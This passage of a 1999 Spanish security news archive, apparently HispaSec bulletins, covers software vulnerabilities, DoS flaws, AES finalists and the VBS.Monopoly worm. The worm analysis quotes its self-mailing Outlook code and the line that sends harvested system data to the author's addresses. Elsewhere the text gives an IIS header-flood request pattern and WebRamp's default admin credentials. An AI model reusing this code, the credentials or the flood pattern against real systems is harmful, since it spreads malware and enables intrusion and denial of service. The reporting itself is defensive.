de drogas, armas, asesinatos y en la entrada de grupos organizados a
Japón.

Sin embargo, las explicaciones del gobierno no terminan de convencer
a la gran masa social, que ve con miedo la posibilidad de que esta
ley dañe los derechos más básicos sobre privacidad e intimidad. A
fin de cuentas, se supone que los grupos organizados utilizaran
sistemas criptográficos fuera del alcance del gobierno, con lo que
para muchos los argumentos esgrimidos son sólo una mala justificación
de cara al control de las comunicaciones del ciudadano.

Mientras tanto, en Australia, Internet también se encuentra en el ojo
del huracán de la clase política. En esta ocasión, dentro de la
normativa que rige los servicios de difusión, se está intentando
implantar la censura en cuanto a los contenidos accesibles en la Red.

En principio, se quiere hacer hincapié en el material pornográfico y
el clasificado de alto riesgo, como puede ser la construcción de bombas.
El gobierno se escuda en que las medidas han sido fruto de la petición
popular, donde los padres han ejercido mucha presión preocupados por
los contenidos nocivos que sus hijos pueden encontrar en la Red.

De nuevo todo parece indicar que el perjudicado será el ciudadano de
a pie, ya que las medidas a tomar no impedirán a las personas con los
medios o conocimientos necesarios saltarse este tipo de censuras y
seguir accediendo a todos los contenidos. Por otro lado, ya existe
en el mercado software de control parental, destinado a restringir
contenidos clasificados a los más pequeños, por lo que de nuevo
la argumentación del gobierno parece estar fuera de lugar.

Más información:
South China Morning Post
News Australian



Bernardo Quintero



domingo, 15 de agosto de 1999

Buffers Overflows en software para Windows

NextFTP, Chocoa y Almail32, clientes de FTP, IRC y Mail para Windows
respectivamente, presentan vulnerabilidades debido a desbordamientos
del buffer. Estas buffers overflows permiten ejecutar comandos en la
máquina de forma remota, lo que puede ofrecer el control total del
sistema a un atacante.
Por lo general, un buffer es considerado una matriz, es decir,
una colección de datos del mismo tipo almacenados en localizaciones
de memoria contiguas. Cuando en el buffer se intenta almacenar más
datos de los que puede contener se produce el overflow o desbordamiento.
Si en el código del programa no se tiene en cuenta esta posibilidad,
los datos extras que no caben en el buffer ocuparán las direcciones
de memoria contiguas, por lo que se sobreescribirán otras variables
distintas que estuvieran ahí almacenadas.

En definitiva, se produce la escritura directa en zonas de memoria
fuera del control del programa, lo que permite, a través de diferentes
técnicas, tomar el control de la máquina. Por ejemplo, en las pilas
se almacenan variables, entre otras, la dirección de memoria a la que
retornar tras la llamada a una subrutina. Un atacante podría alterar
el flujo del programa, y apuntar a una dirección de memoria donde
ejecutar su propio código y comprometer así la seguridad del sistema.

NextFTP v.182 es un cliente shareware de FTP para Windows 95/98/NT de
la firma ToxSoft, que contiene una vulnerabilidad basada en un
desbordamiento al recibir una cadena larga como respuesta a un comando
CWD. El servidor de FTP puede a través de un mensaje preparado provocar
el desbordamiento en el cliente y ejecutar cualquier comando a nivel
del sistema Windows.

El caso del cliente de IRC Chocoa es parecido, en esta ocasión el
desbordamiento se produce en el buffer encargado de procesar el "topic"
de los canales de IRC. El servidor de IRC puede sobreescribir el buffer
y ejecutar código arbitrario en los sistemas Windows 95/98/NT que
utilicen este cliente.

Por último nos encontramos con el cliente de correo AlMail32, que al
igual que los programas anteriores contiene una vulnerabilidad basada
en un buffer overflow. En este caso sucede cuando se recibe en un
correo electrónico una cadena excesivamente larga en los campos FROM:
o TO:. También como en las ocasiones anteriores, esta vulnerabilidad
permite ejecutar cualquier comando en todas las versiones de Windows.

Más información:
Shadow Penguin Security



Bernardo Quintero



sábado, 14 de agosto de 1999

Polémico parche de Microsot para Information Server

Recientemente Microsoft publicó un parche para cubrir una
vulnerabilidad que puede ser empleada para causar ataques de
denegación de servicios contra el servidor web que se ofrece con
Internet Information Server 4.0. La polémica surgió a las pocas
horas después cuando rectificaba su publicación y retiraba el
parche de sus servidores.
El problema ocurre cuando múltiples peticiones http con cabeceras
especialmente mal construidas se envían al servidor web atacado.
A causa de este ataque Information Server consumirá toda la
memoria del servidor. Si esto ocurre, IIS será incapaz de
responder a ninguna petición hasta que los clientes que
realizaron las peticiones se cierren o bien el servicio IIS sea
parado y reiniciado. Una vez que ocurra cualquiera de ambas
acciones el servidor web volverá a su funcionamiento normal.

Básicamente, el ataque puede realizarse mediante la solicitud de
múltiples peticiones "Host: aaaaa...aa" al IIS como sigue:

GET / HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
...10,000 líneas
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)

Pero el mismo día en que Microsoft publicaba un boletín de
seguridad para comunicar esta vulnerabilidad e informaba de la
disponibilidad de un parche para solucionarla, volvía a emitir un
nuevo comunicado para alertar de la existencia de un error en el
parche publicado. Por lo que se retiraba el parche de los
servidores de Microsoft hasta la difusión del parche adecuado.

En el segundo boletín se comunicaba que toda la información sobre
el bug es correcta, el problema venía dado por el parche que
podía provocar el cuelgue del Internet Information Server si el
archivo de log del IIS alcanzaba un tamaño múltiplo de 64 Kbytes.
Por este motivo, Microsoft se vió obligada a retirar el parche de
sus servidores e informar del nuevo problema.

Según informa en un breve periodo de tiempo, la compañía tendrá a
disposición de todos los administradores el parche correcto para
su instalación.

Más información:
Boletín Microsoft original
Preguntas y respuestas sobre el bug
Boletín de cancelación



Antonio Ropero



viernes, 13 de agosto de 1999

El Equipo Hispano RC5-64 en el TOP-100

El Equipo Hispano RC5-64 (eÑe Power) ha alcanzado el TOP-100 en
la clasificación que mantiene "Distributed.Net", enmarcada dentro
del reto RC5-64 que lanzó la RSA. La progresión de éstos últimos
meses, y la incorporación de nuevos miembros, hacen pensar que
la escalada continuará hasta cotas mayores.
En estos momentos, y tras 661 días de proceso, "Distributed.Net"
lleva comprobado el 11,46% de las posibles soluciones al reto.
Este es el resultado de aglutinar el esfuerzo de más de 195.000
participantes, en uno de los proyectos de informática distribuida
más importantes llevados hasta la fecha.

Para participar de forma activa tan sólo es necesario un ordenador
con conexión a Internet. De las páginas de distributed.net
(www.distributed.net) se puede recibir el cliente adecuado para cada
plataforma, sólo queda configurarlo convenientemente. El cliente de
"Distributed.Net" sólo utilizará los tiempos muertos de la CPU para
procesar las posibles soluciones al reto, por lo que el sistema no
perderá potencia en su trabajo habitual.

"Distributed.Net" permite que se puedan formar equipos a los que
los participantes se pueden unir, con esto se consigue una doble
motivación, ya que se compite en los rankings de manera individual
y colectiva. El Equipo Hispano RC5-64 (eÑe Power) es el mas veterano,
representativo y potente del mundo Hispano. Desde sus comienzos ha
pasado por diferentes etapas y denominaciones hasta convertirse en
el equipo hispano RC5-64 por excelencia. En estos momentos se
encuentra en el puesto 99 de entre los 7.464 equipos registrados,
fruto del esfuerzo común de sus 188 integrantes.

A continuación reproducimos parte de una entrevista al coordinador
del equipo, Jesús Cea Avión, Ingeniero de Telecomunicaciones, publicada
en PCActual.

-¨¿Qué te motivó a participar en este proyecto?"

Personalmente soy un defensor de la intimidad y seguridad en la red, un
criptólogo aficionado y, por tanto, me interesa probar que los recortes
políticos¯a la tecnología de cifrado no garantizan la seguridad y sólo
contribuyen a dar una sensación de fiabilidad irreal.

-"En el caso remoto de que eÑe Power hallara la clave, ¨¿qué se haría
con el premio?"

Los 1.000 dólares se invertirían en lo que se decida entre todos.
Algunos pensamos que no estaría mal organizar una cena, por ejemplo,
para conocer cara a cara a tus compañeros de equipo. En todo caso el
premio en metálico tiene un carácter puramente simbólico. Las personas
que dedican su tiempo a esta tarea lo hacen por amor al arte.

-¨¿Cómo explicarías la importancia del RC5?"

RC5 es un sistema de cifrado. Es decir, de protección de información.
La información se cifra utilizando el algoritmo RC5 y una clave secreta.
De esta forma sólo quien conozca la clave tiene acceso al mensaje. La
aplicación básica es la confidencialidad de la información como en el
correo electrónico o en las transacciones bancarias. También nos
permite asegurarnos de la identidad del remitente y de que el mensaje
no ha sido modificado. También se utiliza en el comercio electrónico,
monederos inteligentes (por ejemplo, visa cash) o la confidencialidad
del correo electrónico.

-¨¿Por que tanto empeño en demostrar su vulnerabilidad?"

La criptografía es un derecho fundamental a la privacidad y a la
integridad de la información. Ese derecho no puede ser alienado por
ninguna ley. Sencillamente porque la tecnología existe y los verdaderos
criminales tienen acceso a ella y, por definición, no obedecerán las
leyes que restringen su uso. En ese sentido no puede tolerarse ninguna
ley que fije un límite en la complejidad o nivel de protección
criptográfica, sencillamente porque las personas que tienen algo que
perder con ello no las obedecerán. Dado que los gobiernos parecen
decidir por nosotros el nivel que consideran seguro, el proyecto
RC5-56, RC5-64 y el reciente DES II-2, demuestran que los estándares
gubernamentales están muy lejos de proporcionar una protección real.
Es nuestro derecho y nuestro deber el revelar este hecho y hacer lo
posible para que se nos permita corregirlo.

Más información:
Retos RSA: http://www.rsa.com/rsalabs/html/challenges.html
Distributed.Net:
http://www.distributed.net/
http://www.distributed.net/rc5/
Equipo Hispano RC5-64 (eÑe Power):
http://www.argo.es/~jcea/artic/cripto.htm
http://www.argo.es/~jcea/artic/rc5-64sts.htm
http://www.argo.es/~jcea/artic/rc5-64cfg.htm
Información en HispaSec:
http://www.hispasec.com/unaaldia.asp?id=254
http://www.hispasec.com/des-3.asp
http://www.hispasec.com/unaaldia.asp?id=84
http://www.hispasec.com/unaaldia.asp?id=82
http://www.hispasec.com/unaaldia.asp?id=60



Bernardo Quintero



jueves, 12 de agosto de 1999

Recta final para el nuevo estándar de cifrado

Presentados los 5 finalistas para el Estándar Avanzado de Cifrado, se
abre el plazo para evaluarlos. Para mediados del año 2000 se prevé que
tendrá lugar la elección del algoritmo que sustituirá al DES.
El AES (Avanced Encryption Standard) es el algoritmo de cifrado que
sustituirá al DES (Data Encryption Standard). El NIST (National
Institute of Standards and Technology) solicitó en 1997 que se
presentaran los algoritmos candidatos para este estándar. Antes de
que terminara el plazo en junio de 1998, el instituto recibió 15
propuestas.

El instituto pidió comentarios sobre estos algoritmos, con la intención
de podar una lista de cinco finalistas. En abril, y a fin de evaluar,
llevó a cabo una conferencia sobre el AES en Roma. El plazo para
recabar todos los comentarios fue el mes de junio. Este pasado lunes,
el instituto anunció los finalistas:

-Mars, fruto del trabajo de un equipo de IBM.

-RC6, de RSA Data Security (incluido Ron Rivest).

-Rijndael, diseñado por un equipo de criptógrafos belgas.

-Serpent, por los criptógrafos Ross Anderson, Eli Biham, y Lars Knudsen.

-Twofish, de Counterpane Systems, incluido Bruce Schneier.

Ahora el gobierno debe elegir entre los finalistas. El instituto está
solicitando de nuevo comentarios y valoraciones sobre los algoritmos
finalistas. En abril del año 2000 habrá una tercera conferencia sobre
el AES en Nueva York, conjuntamente con el Séptimo Taller sobre
Software de Cifrado Rápido.

Los comentarios y evaluaciones deben presentarse antes del 15 de mayo
del 2000, tras esa fecha el instituto propondrá un estándar. Despues,
el AES pasará por el proceso formal de la aprobación del gobierno y
se convertirá en un Estándar Federal del Tratamiento de la Información.
Probablemente, se convertirá en el algoritmo estándar de cifrado para
las aplicaciones internacionales.

En estos momentos los criptógrafos están evaluando a cada uno de los
finalistas. Se prevé que no se encuentre ninguna debilidad seria, por
lo que la elección final vendrá dada por factores como la potencia,
flexibilidad y conveniencia de cara a los entornos tan heterogeneos
donde se tendrá que utilizar.

Más información:
ZDNet
HispaSec
Fast Software Encryption Workshop 2000



Bernardo Quintero



miércoles, 11 de agosto de 1999

Cuenta de administración por defecto en WebRamp

Durante la instalación de WebRamp no se fuerza el cambio de contraseña
de la cuenta de administración que viene por defecto. Este hecho está
provocando que se encuentren muchos casos donde se conserva dicha
cuenta intacta, lo que permite ataques que comprometen al sistema.
WebRamp es un dispositivo hardware de comunicaciones que permite que
varios ordenadores compartan un acceso a Internet. Existe una familia
de modelos que Ramp Networks provee según las necesidades de los
sistemas, así podemos encontrar características avanzadas como soporte
de varios módems simultáneos, controles de acceso, soporte de redes
privadas virtuales o acceso remoto.

Entre las utilidades básicas, presentes en los distintos modelos, se
encuentra la posibilidad de administrar el dispositivo a través del
Web. Para lograrlo el usuario debe autentificarse mediante un formulario
con la cuenta de administración, el nombre de usuario de esta cuenta
es fijo (wradmin) y durante la instalación no se fuerza a cambiar la
contraseña por defecto (trancell). Se ha detectado que en muchos casos
se mantiene la cuenta de administración por defecto, lo que posibilita
el control de la configuración y el ataque al sistema.

En los modelos WebRamp M3 y 200i, podemos encontrar el nombre de usuario,
contraseña y el teléfono del ISP con el que el sistema se autentifica
para conectarse a Internet. Una vez un atacante se haya autentificado
como administrador, con la cuenta por defecto, bastará con que se
dirija a la página "avconnX.htm", donde X es el número del módem del
que quiere conocer los datos de conexión.

En sistemas con más de un módem asociado al dispositivo, es posible
configurarlo de manera que WebRamp llame al módem del atacante, y que
le preste servicios para acceder tanto a la red local como al exterior.
El resultado es que los atacantes pueden acceder a Internet de manera
totalmente gratuita, ya que el coste de la llamada lo soportaría el
propietario del dispositivo.

La solución pasa por cambiar la contraseña de la cuenta de administración,
norma básica para todas las cuentas que vengan por defecto en cualquier
sistema.

Más información:
SecurityFocus
Ataque DoS (HispaSec)
Ramp Networks



Bernardo Quintero



martes, 10 de agosto de 1999

Grave problema de seguridad con IRDP

Un nuevo aviso de seguridad de L0pht destaca un grave problema
existente en sistemas Windows y Solaris que puede posibilitar
desde un simple ataque de denegación de servicios hasta la
escucha de todo el tráfico de la red.
El protocolo ICMP Router Discovery Protocol (IRDP) se encuentra
activado por defecto en los clientes DHCP que corren bajo Windows
95, Windows 98 y Windows 2000. En ellos, si un atacante falsea
los mensajes IRDP, puede llegar a añadir de forma remota entradas
en la tabla de rutado del sistema remoto. El sistema tendrá
preferencia por la ruta añadida por el atacante frente a la
obtenida del servidor DHCP.

Algunos sistemas SunOS también pueden usar de forma intencionada
IRDP bajo condiciones específicas. Para Solaris 2.6 el demonio
IRDP (in.rdisc) se iniciará si el sistema es un host y no un
router, si el sistema no adquiere un gateway del servidor DHCP,
si el sistema no tiene rutas estáticas y si el sistema no dispone
de un archivo etc/defaultrouter válido.

El grupo quiere destacar que el punto importante de su aviso no
recae en que los paquetes ICMP de solicitud de rutado no tengan
propiedades de autentificación. Aunque esto es un problema, ya
era conocido con anterioridad. El peligro recae en que las
plataformas Windows comentadas, activan el protocolo y confían en
él incluso aunque la configuración DHCP especifique la
información de rutado.

A través de este problema un atacante puede efectuar escuchas
pasivas, es decir, el usuario malicioso puede re-enrutar el
tráfico saliente del sistema vulnerable hacia el suyo propio.
Incluso llevando este ataque un poco más lejos, puede hacer lo
que se conoce como hombre en el medio (man in the middle). Es
decir, el atacante puede llegar a modificar el tráfico saliente
del sistema atacado y hacer que este sea considerado como
auténtico. También puede causar problemas de denegación de
servicios, añadiendo múltiples entradas falsas en la tabla de
rutado del host atacado.

Más información:
L0pht: http://www.l0pht.com
Aviso de Seguridad de L0pht: http://www.l0pht.com/advisories/rdp.txt
Cómo eliminar el protocolo IRDP: http://support.microsoft.com/support/kb/articles/q216/1/41.asp
Infoworld: http://www.infoworld.com/cgi-bin/displayStory.pl?990812.enlopht.htm
ZDNet: http://www.zdnet.com/zdnn/stories/news/0,4586,2313209,00.html



Antonio Ropero



lunes, 9 de agosto de 1999

Problema de denegación de servicios en Firewall-1

Existe un problema de denegación de servicios en algunas
implementaciones del conocido cortafuegos Firewall-1 de Check Point
Software.
El ataque de denegación de servicios se hace posible debido a la
forma en que Firwall-1 trata las conexiones TCP. Habitualmente
para iniciar una conexión TCP, se envía un paquete SYN al host de
destino. En aquellos sistemas en los que se encuentra instalado
Firewall-1, este paquete es el primero que se pasa a través de la
pila TCP interna mantenida por el firewall, antes de ser enviada
a la pila nativa del sistema operativo.

Cuando Firewall-1 filtra dicho primer paquete, lo chequea contra
e conjunto de reglas. Si la sesión está permitida por las reglas
se añade a la tabla de conexiones con un timeout de 60 segundos.
Cuando el host remoto responde con un paquete ACK (Acknowledge)
la sesión se configura con un timeout de 3.600 segundos.

Pero si se inicia la conexión con un paquete ACK, Firewall-1 lo
compara con el conjunto de reglas y si está permitido se añade a
la tabla de conexiones. Sin embargo, el timeout asignado es de
3.600 pero no se presta atención a si el sistema remoto responde
o no. De tal forma que se tiene una sesión iniciada con un
timeout de una hora, incluso aunque el sistema no responda. Si se
realiza esta misma acción con muchos paquetes ACK provocará que
se llene la tabla de conexiones. Como resultado Firewall-1
rechazará cualquier conexión posterior.

Para evitarlo se pueden establecer varias soluciones, como
introducir una nueva regla que limite la posibilidad de
introducir paquetes ACK en la tabla de conexiones, incrementar el
tamaño de la tabla de conexiones para aumentar de esta forma el
número de paquetes ACK necesarios para causar la denegación de
servicios, o reducir el timeout a un valor lo suficientemente
bajo como para imposibilitar que se llene la tabla de conexiones.

Más información:
Securityfocus: http://www.securityfocus.com/vdb/bottom.html?vid=549
Check Point: http://www.checkpoint.com/


Antonio Ropero



domingo, 8 de agosto de 1999

Denegación de Servicio en Windows NT Terminal Server

Se ha descubierto un nuevo ataque DoS (Denial of Service) contra
Windows NT 4.0 Terminal Server. Esta vulnerabilidad permite que
un atacante remoto consuma de forma rápida toda la memoria disponible
en un servidor NT 4.0 con Terminal Server, con lo que se produce una
degradación en los servicios prestados en ese momento a otros
usuarios e impide que se pueda llevar a cabo cualquier otra conexión.
Windows NT 4.0 Terminal Server escucha a través del puerto TCP 3389
a los posibles usuarios que se quieran conectar. Cuando se lleva a
cabo una conexión a dicho puerto el software consume recursos del
sistema para poder manejar y autentificar la nueva petición. Esta
forma de proceder es lógica si tenemos en cuenta que el software
debe prestar numerosos servicios, sin embargo Terminal Server
empieza a consumir demasiados recursos antes incluso de que se lleve
a cabo la autentificación, y por tanto se demuestre que el usuario
tiene acceso a utilizar el Terminal Server.

Esta peculiar forma que el software tiene a la hora de manejar las
peticiones de conexión, es la que permite que un atacante remoto
pueda lograr colapsar el servidor consumiendo toda su memoria. Tan
sólo basta con lanzar numerosas conexiones TCP normales al puerto
3389 contra la dirección del servidor víctima. Cada una de las
peticiones que lanza el atacante terminarán por desaparecer forzadas
por el timeout del servidor, y por lo tanto el consumo de recursos
que conllevaba. Sin embargo, un ataque prolongado con un mínimo ancho
de banda puede lograr mantener ocupado al sistema, debido a que la
petición constante de nuevas conexiones compensa a las que se pierden
por sobrepasar el timeout (tiempo de espera).

En las pruebas realizadas, mediante el uso continuo de peticiones al
puerto 3389 de una máquina con Terminal Server, se ha acaparado toda
la memoria del sistema y el servicio ha sido inutilizado por la
sobrecarga, con lo que incluso ha sido necesario reiniciar el sistema
para volver operativo el servicio.

Para prevenir este tipo de ataques se puede filtrar los paquetes
destinados a un puerto específico, en este caso el TCP 3389. En el caso
de que sólo usuarios internos tengan acceso legítimo, bastará con
rechazar cualquier paquete a este puerto proveniente de un rango de
direcciones IP distinta a la nuestra. Si también se cuenta con usuarios
externos deberemos limitar los accesos en razón de direcciones IP
específicas ó incluso redes desde las que provengan.

En el caso concreto que nos ocupa, se recomienda instalar el parche
que ha puesto a disposición Microsoft. Esta actualización provoca que
nuestro software no inicie ningún consumo de recursos extra hasta que
el usuario es autentificado, con lo que el envío sucesivo de paquetes
TCP contra el puerto 3389 no provocará la denegación de servicio de
forma tan inmediata. En los casos de un "bombardeo" de paquetes sigue
siendo recomendable algún tipo de filtro.

Parche disponible en:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40tse/hotfixes-postSP4/Flood-fix/

Más información:
Boletín Microsoft: http://www.microsoft.com/security/bulletins/ms99-028.asp
FAQ: http://www.microsoft.com/security/bulletins/MS99-028faq.asp
SecurityFocus: http://www.securityfocus.com/templates/advisory.html?id=1674
SecurityFocus: http://www.securityfocus.com/level2/bottom.html?go=vulnerabilities&id=571



Bernardo Quintero



sábado, 7 de agosto de 1999

Gusano VBS.Monopoly

Outlook.Monopoly, bautizado por las casas antivirus como VBS.Monopoly,
es un gusano escrito en VBScript que utiliza, como lo hiciera Melissa,
el cliente de correo Outlook para adjuntarse a los emails y difundirse.
Hay que destacar en éste espécimen que la mayor parte de su código se
encuentra codificado, por lo que a simple vista puede parecer más
críptico, aunque en realidad su análisis sigue siendo trivial. En
HispaSec, como viene siendo habitual, os describimos el virus
comentando su código en claro como referencia.
El gusano puede llegar al usuario adjunto en un email, el fichero
"MONOPOLY.VBS" vendrá dentro del correo electrónico con el asunto
"Bill Gates joke", y en el cuerpo del mensaje: "Bill Gates is guilty
of monopoly. Here is the proof. :-)"

El usuario, creyendo que se trata de alguna broma con referencias a
Bill Gates, puede ejecutar haciendo doble click el fichero "MONOPOLY.VBS".
En tal caso se crea el fichero "MONOPOLY.JPG", y si la versión de
VBScript es la 5 o superior también crea los ficheros "MONOPOLY.WSH" y
"MONOPOLY.VBE". El fichero con extensión "WSH" se encarga de ejecutar
el cuerpo principal del gusano que se encuentra codificado en
"MONOPOLY.VBE". Si todo ésto se lleva a cabo la aparente broma hará
su aparición mostrando el gráfico JPG, que simula el tablero del
popular juego de mesa Monopoly con la imagen de Bill Gates en el
centro. También aparece el mensaje: "Bill Gates is guilty of monopoly.
Here is the proof."

A continuación podemos ver la parte del código donde comprueba
mediante una clave del registro si ya había infectado el sistema. En
caso contrario recopila las direcciones de la libreta de contactos de
Outlook para proceder a autoenviarse adjuntándose al email.

---
Set A1 = CreateObject("WScript.Shell")
A2 = A1.RegRead("HKEY_LOCAL_MACHINE\Software\OUTLOOK.Monopoly\")
If A2 <> "True" Then
Set A3 = CreateObject("Outlook.Application")
Set A4 = A3.GetNameSpace("MAPI")
For Each A5 In A4.AddressLists
If A5.AddressEntries.Count <> 0 Then
Set A6 = A3.CreateItem(0)
For A7 = 1 To A5.AddressEntries.Count
Set A8 = A5.AddressEntries(A7)
If A7 = 1 Then
A6.BCC = A8.Address
---

Código del virus donde asigna el asunto del email, el cuerpo del
mensaje, y se autoenvía adjuntándose con el nombre de "MONOPOLY.VBS"

---
A6.Subject = "Bill Gates joke"
A6.Body = "Bill Gates is guilty of monopoly. Here is the proof. :-)"
Set A9 = CreateObject("Scripting.FileSystemObject")
A6.Attachments.Add A9.BuildPath(A9.GetSpecialFolder(2),"MONOPOLY.VBS")
A6.DeleteAfterSubmit = True
A6.Send
---

Otro rasgo característico es que el autor parece ser que quiso hacer
de su gusano un recolector de información, o al menos poder seguir la
pista de su difusión. Por ello, el gusano envía un email con información
que recopila de los sistemas infectados.

Código del virus donde se encuentran las direcciones a las que envía
información sobre los sistemas infectados:

---
A10.BCC = "monopoly@mixmail.com; monpooly@telebot.com; mooponly@ciudad.com.ar; mloponoy@usa.net; yloponom@gnwmail.com"
---

Porción de código donde se puede apreciar como interroga el registro
de Windows para recoger información del sistema como es el nombre de
usuario, ordenador, organización, fecha, día. El listado es mucho más
extenso y recoge país, código postal, lenguaje, versión de Windows,
número de serie, ficheros del ICQ, direcciones de la libreta de correo
y pagina de inicio del Internet Explorer.

--------
A11 = A1.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
A10.Subject = "OUTLOOK.Monopoly coming from """ & A11 & """"
A12 = "- Information" & Chr(13) & Chr(10) & Chr(13) & Chr(10) & "Time: """
A12 = A12 & Time
A12 = A12 & """" & Chr(13) & Chr(10) & "Date: """
A12 = A12 & Date
A12 = A12 & """" & Chr(13) & Chr(10) & "Name: """ & A11 & """" & Chr(13) & Chr(10) & "Organization: """
A12 = A12 & A1.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
A12 = A12 & """" & Chr(13) & Chr(10) & "Network computer name: """
Set A13 = Createobject("WScript.Network")
A12 = A12 & A13.ComputerName
[...]
--------

Ya se encuentran disponibles las actualizaciones de las principales
casas antivirus que permiten neutralizar éste gusano. Se prevé que no
tenga mayor alcance.

Más información:
Panda Software: http://www.pandasoftware.es/vernoticia.asp?noticia=262&idioma=1
AVP: http://www.kasperskylab.ru/eng/news/press/990809.html
Sophos: http://www.sophos.com/downloads/ide/index.html#monopoly



Bernardo Quintero



viernes, 6 de agosto de 1999

Parche de Microsoft para evitar el spam a través de Exchange

Microsoft publica un parche para cubrir una vulnerabilidad de
seguridad asociada a los servidores de Exchange, por la cual se
pueden enviar correos falsos empleando el servidor de correo.
La vulnerabilidad podría llegar a permitir el envío de mensajes a
través de un servidor Exchange configurado para actuar como
gateway para otros sitios Exchange empleando el servicio de
mensajería Internet (Internet Messaging Service).

Exchange Server implementa características diseñadas para
eliminar el "e-mail relay" (transmisión de mails), una práctica
por la cual un atacante puede provocar que un servidor de correo
reenvíe correo del atacante, como si el servidor fuera quien
envía el mensaje. Sin embargo, existe una vulnerabilidad en dicha
característica de protección por la cual un atacante puede evitar
las propiedades anti-relay.

El "mail relaying" es una técnica empleada habitualmente para
envío de mails falsos y correos masivos o spam. Es una práctica
por la cual se falsea la dirección original del emisor del
mensaje mediante el uso del servidor de correo atacado. Los
servidores atacados pueden sufrir problemas de denegación de
servicios causados por el uso masivo de los servicios de correo,
dejándolos no disponibles a los usuarios legítimos.

La vulnerabilidad reside en la forma en que se realiza el reenvío
de sitio a sitio a través de SMTP. Se pueden emplear direcciones
smtp encapsuladas para enviar correo a cualquier dirección e-mail
que se desee. El parche elimina la vulnerabilidad tratando las
direcciones smtp encapsuladas de la misma forma que las no
encapsuladas.

La vulnerabilidad sólo se presenta cuando se instala IMS
(Internet Messaging System), lo cual no se realiza en las
instalaciones por defecto de Microsoft Exchange Server.

Más información:
Parche:
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng
/Exchg5.5/PostSP2/imc-fix
Preguntas y respuestas sobre la vulnerabilidad:
http://www.microsoft.com/security/bulletins/MS99-027faq.asp
Boletín de seguridad Microsoft:
http://www.microsoft.com/security/bulletins/MS99-027faq.asp



Antonio Ropero



jueves, 5 de agosto de 1999

Windows 2000 y Linux desafían a los hackers; El marcador tlf de Windows NT vulnerable

Microsoft ha decidido evaluar la seguridad de Windows 2000, el
sistema operativo destinado a sustituir la gama Windows NT. Para
ello ha configurado un servidor y reta a los hackers que logren
penetrar en él. Tras ello, ha surgido otra iniciativa similar
pero bajo sistema operativo Linux.
En numerosas ocasiones han surgido iniciativas similares por
parte de otras empresas y productos, en esta ocasión Microsoft ha
configurado un servidor con su sistema operativo más moderno,
todavía en fase beta, y reta a los hackers a que entren en él. El
servidor tiene instalado la versión más reciente de Windows 2000
con Internet Information Server.

En el servidor de prueba, alojado en www.windows2000test.com se
pueden encontrar las bases del juego, en las que se insta a
comprometer el sistema a través de alguna de las cuentas de
usuario. El reto también pide intentar modificar alguno de los
archivos hospedados o conseguir determinada información escondida
en la máquina.

Si bien el reto no ha sido bien recibido por la comunidad
underground, que alega que Microsoft ya dispone de medios
suficientes para investigar la seguridad de sus productos sin
requerir la ayuda de hackers de forma gratuita. Por otra parte,
según se comprueba en las estadísticas del sistema los errores y
problemas más diversos están afectando al servidor dejándolo
inoperativo la mayor parte del tiempo y ello sin la necesidad de
sufrir ningún tipo de ataque.

Como respuesta a este reto, ha surgido otro con reglas similares
en el cual la máquina (crack.linuxppc.org) se encuentra
configurada con LinuxPPC (Linux para PowerPC) y Apache como
servidor web. Aunque en esta ocasión el reto parece mucho más
tentador ya que como recompensa para aquel que logre realizar una
intrusión exitosa se ofrece la propia máquina en la que se aloja
la prueba.


El marcador telefónico de Windows NT vulnerable ante ataques
------------------------------------------------------------

Un programa tan inocente como puede parecer el marcador
telefónico (o dialer), el programa para efectuar llamadas de voz
a través del módem, puede causar serios problemas por una
vulnerabilidad descubierta recientemente.

El marcador telefónico de Windows NT 4, ofrece una vulnerabilidad
de sobrecarga de buffer que puede permitir a un atacante ejecutar
código arbitrario en el entorno de seguridad de otro usuario. La
vulnerabilidad afecta principalmente a estaciones de trabajo que
tienen la capacidad de marcado mediante un módem. La aplicación
dialer.exe es un programa incluido dentro de la distribución de
Windows NT y que permite efectuar llamadas de voz a través del
ordenador.

El problema ocurre cuando el dialer.exe lee una cadena demasiado
larga en el último número marcado almacenado en el dialer.ini, el
archivo de inicialización del programa. La capacidad del buffer
para dicho número es de 100 bytes, de tal forma que cuando se
introduce una cadena de 104 caracteres de longitud en el buffer,
este se llena y la dirección de retorno se sobrescribe, dando al
atacante la posibilidad de ejecutar programas.

El código del exploit permite ejecutar un archivo bat con las
instrucciones que se deseen ejecutar con los permisos del usuario
que ejecute el marcador. De tal forma que si es el administrador
quien hace uso de dicha aplicación, el atacante podrá conseguir
privilegios de administrador.

Microsoft reconoce el problema y ha publicado un parche, que
recomienda instalar para solucionar este agujero. Si bien si se
siguen los consejos de Microsoft en la Guía de Instalación Segura
de Windows NT se puede evitar este problema y muchos otros
similares. En dicha guía se recomienda configurar la carpeta
%systemroot% con permisos de Control Total para los
Administradores, Creadores y Sistema mientras que el resto de los
usuarios tan sólo deben tener permiso de lectura.


Antonio Ropero


Más información:

Reto Windows 2000: http://www.windows2000test.com
Reto LinuxPPC: http://crack.linuxppc.org

Parche marcador telefónico:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/Dialer-fix/
Boletín de Microsoft sobre el bug:
http://www.microsoft.com/security/Bulletins/ms99-026.asp
Microsoft Preguntas y respuestas sobre el bug:
http://www.microsoft.com/security/Bulletins/ms99-026faq.asp
Guía de Instalación segura de Windows NT:
http://www.microsoft.com/ntserver/security/exec/overview/Secure_NTInstall.asp

martes, 3 de agosto de 1999

El dispositivo de cifrado más rápido del mundo

Los investigadores del Sandia National Laboratories han desarrollado
el dispositivo hardware de cifrado más rápido del mundo. Su potencia
le lleva a ser 10 veces más veloz que cualquier otro dispositivo
similar conocido hasta la fecha, es capaz de cifrar a una velocidad
de 6,7 Billones de bits por segundo.
"Es fenomenal" dice Lyndon Pierson, el ingeniero que lo diseñó, "hemos
producido un dispositivo que tiene la seguridad y la anchura de banda
necesaria para la protección de todos los tipos de información
digitalizada: voz, audio, vídeo, móviles, radio, televisión,
transacciones bancarias y de tarjetas de crédito, y cualquier
otro fin de carácter general a velocidades que antes eran impensables."

